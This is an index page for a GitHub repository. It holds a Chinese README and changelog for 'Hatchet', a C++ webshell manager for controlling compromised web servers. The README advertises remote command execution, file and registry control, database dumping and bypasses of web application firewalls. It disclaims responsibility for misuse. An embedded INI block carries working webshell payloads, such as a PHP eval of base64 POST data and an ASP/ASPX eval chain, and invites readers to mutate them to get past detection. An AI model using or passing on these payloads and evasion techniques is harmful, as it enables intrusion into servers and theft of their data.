Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/euphrat1ca/hatchet
cknife(webshell manager)
https://github.com/euphrat1ca/hatchet
Last synced: about 1 month ago
JSON representation
cknife(webshell manager)
- Host: GitHub
- URL: https://github.com/euphrat1ca/hatchet
- Owner: euphrat1ca
- Created: 2018-03-06T06:54:55.000Z (almost 7 years ago)
- Default Branch: master
- Last Pushed: 2018-03-06T07:26:11.000Z (almost 7 years ago)
- Last Synced: 2024-08-03T18:12:34.704Z (4 months ago)
- Language: C++
- Homepage:
- Size: 1.04 MB
- Stars: 27
- Watchers: 0
- Forks: 20
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-webshell - **8**星
README
Hatchet VS2005完整源码
免责申明:
请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果本厂家不承担任何责任!
------------------------------------------------------------
1. 说明:
我是一个产刀的,用于什么用途,由您自行选择。2. 致谢:
菜刀某前辈及各位网友的建议3. 弱点:
存在细节方面没处理好
数据库与菜刀有所区别不能共用4. 优点:
持续更新
快捷键操作
注册表读取
HTTP头自行控制
POST部分数据可自定义,突破安全狗等WAF(一句话需自行处理)
PHP Warning 警告去除,避免某些WAF等记录
PHP支持多种执行命令,安全模式也能执行
PHP管理PostgreSQL、ODBC_MSSQL、PDO_MYSQL、PDO_MSSQL数据库
HTTP代理,只完成PHP。支持HTTP[S] GET POST
文件夹双击进入,树形框的上一层可以点击
支持NTLM验证
COMBO历史记录
支持选择数据库后直接执行SQL命令
数据库右键获取20条记录
支持JSP上传
文件[夹]剪切(文件移动机制秒移)
文件[夹]多选删除
文件[夹]多选下载
应该来说不会崩溃
右键导出数据库查询结果保存TXT,默认每一个字段用一个【TAB】分开,如果需要用其他字符请在填写保存文件名的时候,后面加上&&,紧跟分隔符。如: table.txt&&@_@
数据库执行SQL查询时,直接导出到本地文件,不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt
支持PHP脚本的数据库管理,远程备份。如: Select * From Members Limit 0,20--save:data.sql--split:@_@5. 后门:
缩小体积已加UPX壳
绝无有意添加的后门,但三流的业余技能不排除被远程溢出的BUG
文件: C:\Projects\Hatchet\release\Hatchet.exe
大小: 269312 字节
文件版本: 1.0.0.1
修改时间: 2014年8月26日, 12:19:43
MD5: 91FAA43F3F89083F2E9C78D05E13673C
SHA1: A1B598CB4EB47554E6F191A7EB33111F462C77FD
CRC32: C094BD42```cpp
/*
[Header]
User-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Referer=1
X-Forwarded-For=1
[/Header]
[Headers]
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
[/Headers]
[POST]
ASP_POST_DATA==Execute("Execute(""On+Error+Resume+Next:Response.Clear:ASPX_POST_DATA==Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(%nPageCode%).GetString(System.Convert.FromBase64String("%szBase64EvalCode%")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();
PHP_POST_DATA==@eval(base64_decode($_POST[z0]));&z0=
PHP_POST_Z0_DATA=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);
[/POST]##################################################
#以下是说明
请严格保持该格式,大小写不一样
Referer 为1 则程序自动添加
X-Forwarded-For 为1 则程序自动随机生成添加
如果要自己手动添加其固定值,请设为0,后在[Headers]里添加即可。
[POST]里为POST的部分数据,可自行变异这段代码,过安全狗等,很灵活的哦~
%nPageCode% 为程序需要处理的编码,请保留
%szBase64EvalCode% 为程序需要处理的执行代码,请保留
*/
```
------------------------------------------------------------
2013.12.03
* 本地数据库单引号
* CMD选择所有,任意键覆盖
+ FileSave CTRL+A2013.12.07
* JSP 传递没有 UrlEnCode
+ 增加文件夹下载
* 站点管理,光标URL全选
* szMyBase64Encode.Replace("+","%2B");2013.12.09
+ 增加 HTTP 错误显示
* 修正下载目录,win linux / \
* 修正'\0'格式化发生的截断2013.12.10
+ TAB标签OK
* ASPX脚本编码2013.12.11
* TAB的X范围加大
+ PHP脚本过安全狗2013.12.12
* eval preg_replace均可以使用过狗版本 chr(45).
+ 稍微完善一下状态栏2013.12.13
* 下载、上传文件开启一个新线程2013.12.18
+ asp \r\nOn+Error 过狗
+ aspx var err\r\n 过狗
* Shell类型编辑时,内容一样不更新
* 文件管理重命名、更改时间,内容一样不更新
+ 快捷键 F2 文件管理重命名2013.12.19
+ 增加自写代码
+ 增加HTTP头 INI里配置(在主界面右键里,如果文件不存在,第一次自动生成)2013.12.21
* 修正文件内容Linux(\n)换行显示
+ 文件内容 Ctrl+F 查找
* 修正多线程,随机IP都一样
* PHP Warning 警告去除
+ 自写代码快捷键 Ctrl+A,F5执行2013.12.23
+ 增加右键数据库查询结果导出TXT,默认每一个字段用一个【TAB】分开,如果需要用其他字符请在填写保存文件名的时候,后面加上&&,紧跟分隔符。如: table.txt&&,
+ 增加数据库执行SQL查询时,直接导出到本地文件,不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt
* 数据库查询结果显示,计算错误的小Bug
* 数据库错误显示的问题2013.12.24
* UTF8 GBK互换的BUG2013.12.27
+ 增加连接数据库代码实例
+ 增加命令执行方式(system,passthru,shell_exec,exec,WScript.shell)2013.12.29
+ 增加PHP管理PostgreSQL数据库
* PHP MySQL少写z1=2014.01.04
+ 增加PHP管理ODBC_MSSQL数据库2014.01.07
* 数据库导出HTML编码设置charset=GBK
* JSP查询数据库错误不弹AfxMessageBox2014.01.08
+ Shell列表排序
* Shell日期的月份日期添加前导零
* 修正上传文件大小限制2014.01.09
* 修正CMD,cls清空后上下箭头还原旧内容2014.01.10
+ 显示下载进度大小
* 选择保存文件夹可删除|OFN_NOCHANGEDIR
+ 文件下载完成,自动打开文件夹选定文件。2014.01.14 感谢luoye
* 文件管理路径处理问题。防止调皮的伙伴C:\\\\\\\\\\\\或C://////////或C:
* JSP db2连接例子有误password=123456;后面有分号。2014.01.24
+ 增加标题栏右键系统菜单
+ 记忆选择标签,文件管理,文件内容管理,内容关闭,回到文件管理
* 路途再远,也要回家。小伙伴们春节快乐!!!2014.02.11
* 运行软件,如果存在INI,自动加载。之前需要右键才会加载。OnMainUpdateIni(bool bNoCreat=true);
+ 过360网站卫士
+ POST前一小段数据可在INI里自定义,经研究可突破安全狗等WAF。
"=Execute(\"Execute(\"\"On+Error+Resume+Next: ==> Ini_szASP_POST_DATA + "
"=%40eval%09%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0= ==> Ini_szPHP_POST_DATA + "2014.02.21
+ 数据库和文件管理树形框就地编辑,只是方便复制内容,不会改变服务器。
* 修正获取列表框的小问题。GetNextItem < 0 return;
+ 增加文件复制,文件剪切(仅PHP)2014.02.22
+ 增加文件剪切(ASP ASPX JSP)2014.03.05
* 修正PreTranslateMessage事件处理忘记及时返回
* 修正文件管理,后续增加的映射磁盘网络磁盘等,显示会有问题。2014.03.17
* 某种原因,更改软件名称: Hatchet
+ 增加POST的z0前部分自定义,突破安全宝的Base64关键词。
* 修正CMD框,等宽字体,对齐的问题。2014.03.18
* 修正CMD返回路径的截取问题
* 修正代码执行,等宽字体,对齐的问题。
* 修正获取文件内容,等宽字体,对齐的问题。
+ 增加部分多线程,不卡界面。
+ 增加代码执行导出导入。2014.04.01
* 界面大改动(非常感谢p1n9y_fly)
+ 增加大部分多线程
+ 增加部分快捷键2014.04.02
* 再次修正随机IP都一样
- 取消自动添加Cookie,导致INI里填的Cookie不能被添加上 INTERNET_FLAG_NO_COOKIES
+ 增加快捷键 Ctrl+V
+ 增加系统托盘
* 文件内容保存线程变量未初始化(感谢Xi总)
* 修正重命名、新建目录,如果文件[夹]存在,覆盖。(感谢Xi总)2014.04.04
+ 增加上传文件后自动刷新列表
* 修正PHP文件[夹]可读可写标注。换成is_readable is_writable(感谢敌敌喂)
* 修正树形框,判断给定树项是否包含子项,2014.04.04 BUG,有子项,不一定已经存在(感谢敌敌喂)
* 修正文件管理C:\/\/\/\/这种路径
* 修正CMD Ctrl+V
+ 增加Shell列表快捷键 Insert(添加) Delete(删除) Enter(编辑)
+ 增加文件管理列表快捷键,回车进入文件夹或者文件内容编辑。2014.04.07
* 增强多文件处理
* 修正文件管理树形框小问题
* 更换文件管理EDIT->COMBO
+ 增加注册表管理2014.04.14
+ 增加注册表本地缓存
+ 稍微完善一下状态栏
* 修正asp数据库截取的BUG(感谢Ciph2r)
* 修正编辑的对话框显示位置问题
+ 增加COMBO记录2014.05.07
+ 增加显示版本
* 修正CMD cls保留系统信息
+ 增加CMD Please wait...
+ 增加数据库右键查询20条
+ 增加数据库ESC取消编辑
* 修正文件图标szIcoTemp变量忘记初始化
+ 文件管理,回车或双击的文件如果是以下弹出下载
.jpg.gif.png.bmp.jpeg.ico
.zip.rar.tgz.7z.tar.gz.iso.cab.bz2.jar.dmg
.exe.msi.dll.sys.avi.mpeg.mpg.vob.rmvb.wmv.mp3.mp4.3gp.ogg.voc
.swf.pdf.flv.fla.psd.doc.docx.xls.xlsx.ppt.pptx.mdb.rtf2014.05.09
+ 主页增加复制URL地址(Ctrl+C)
* 文件夹双击进入,树形框跟进(感谢Lee Swagger)
* 文件夹双击进入,树形框选择项并没有改变。SelectItem执行失败,换OnNMClickTree判断
+ 增加ASPX POST数据INI自定义
* MYSQL如有不正常的表名,中文、空格等,请用`包含表名(感谢Hancock)2014.05.21
+ 增加全部EDIT,CTRL+A
* 修正MAIN IDC_EDIT_FIND,大小改变,被覆盖隐藏
+ 增加Wget线程
* 修正数据库显示结果,编码问题导致的死循环
* 修正asp特殊环境缓存的问题。Response.Clear
* 修正asp数据库SI变量初始化
+ 优化数据库返回的列表宽度2014.06.06
+ 增加浏览器功能,以便支持NTLM验证(感谢R)
* 修正CMD如果所在光标位置可更改粘贴(感谢R)
+ 增加CMD,ESC按键,清除当前输入的命令
+ 增加浏览器状态和加载完成后的地址显示2014.07.02
* 修正如果标签已关闭,线程还在运行。导致的程序崩溃。if (pDlg->m_hWnd == NULL)
+ 增加PDO管理mysql和mssql数据库2014.07.07
* 修正PHP执行cmd变量未初始化$ret=1(函数禁用导致的出错)
* 修正CMD显示的小问题
* 切换标签,当前Dialog获得焦点
+ 支持PHP脚本的数据库管理,远程备份2014.08.26
* 文件上传分块缩小,51200
+ 添加一些状态
* Data select show
* CMD命令排序
+ Data Ctrl+C和F2快捷键
* 修正ComboBox下拉高度
+ 添加Shell判断是否存在